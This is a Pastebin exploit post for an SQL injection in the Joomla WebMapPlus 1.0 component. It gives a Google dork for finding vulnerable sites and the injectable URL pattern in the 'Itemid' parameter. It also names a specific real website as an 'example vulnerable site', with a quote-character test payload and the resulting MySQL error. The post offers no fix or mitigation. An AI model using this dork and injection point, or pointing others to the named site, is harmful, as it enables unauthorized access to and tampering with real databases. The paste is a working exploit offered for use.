KingSkrupellos

Joomla WebMapPlus Components 1.0 SQL Injection

Feb 3rd, 2019
94
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.36 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla WebMapPlus Components 1.0 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 04/02/2019
  7. # Vendor Homepage : artio.net
  8. # Software Download Link : github.com/bkulyk/webmapplus.git
  9. # Software Information Link : github.com/bkulyk/webmapplus
  10. bestofjoomla.com/component/option,com_mtree/task,viewlink/link_id,687/Itemid,95/
  11. # Software Version : 1.0
  12. # Tested On : Windows and Linux
  13. # Category : WebApps
  14. # Exploit Risk : Low
  15. # Google Dorks : inurl:''/index.php?option=com_webmapplus''
  16. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  17. Special Elements used in an SQL Command ('SQL Injection') ]
  18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  21.  
  22. ####################################################################
  23.  
  24. # Description about Software :
  25. ***************************
  26.  
  27. Webmap+ is a Google Maps component for Joomla! websites that allows you to post
  28.  
  29. multiple locations on one map. This Joomla! extension has the option to select specific
  30.  
  31. business locations where highlighted, custom attributes of that location can be seen
  32.  
  33. on the map itself or linked to an individual web page. Webmap+ is a great user friendly
  34.  
  35. map tool for businesses to incorporate as an extension to their Joomla! website that
  36.  
  37. will help customers search for addresses, phone numbers and the closest business location.
  38.  
  39. Webmap+ is easy to use, and it fits in seamlessly with the Joomla! back end structure.
  40.  
  41. ####################################################################
  42.  
  43. # Impact :
  44. ***********
  45. Joomla WebMapPlus 1.0 component for Joomla is prone to an SQL-injection
  46.  
  47. vulnerability because it fails to sufficiently sanitize user-supplied
  48.  
  49. data before using it in an SQL query.
  50.  
  51. Exploiting this issue could allow an attacker to compromise the application,
  52.  
  53. access or modify data, or exploit latent vulnerabilities in the underlying database.
  54.  
  55. A remote attacker can send a specially crafted request to the vulnerable application
  56.  
  57. and execute arbitrary SQL commands in application`s database.
  58.  
  59. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  60.  
  61. An attacker can exploit this issue using a browser.
  62.  
  63. ####################################################################
  64.  
  65. # SQL Injection Exploit :
  66. **********************
  67.  
  68. /index.php?option=com_webmapplus&view=location&id=[ID-NUMBER]&Itemid=[SQL Injection]
  69.  
  70. ####################################################################
  71.  
  72. # Example Vulnerable Sites :
  73. *************************
  74.  
  75. [+] hm92.es/index.php?option=com_webmapplus&view=location&id=1&Itemid=88%27
  76.  
  77. ####################################################################
  78.  
  79. # Example SQL Database Error :
  80. ****************************
  81.  
  82. No valid database connection You have an error in your SQL syntax; check the
  83. manual that corresponds to your MySQL server version for the right syntax
  84. to use near ''118''' at line 1
  85.  
  86. ####################################################################
  87.  
  88. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  89.  
  90. ####################################################################
Add Comment
Please, Sign In to add comment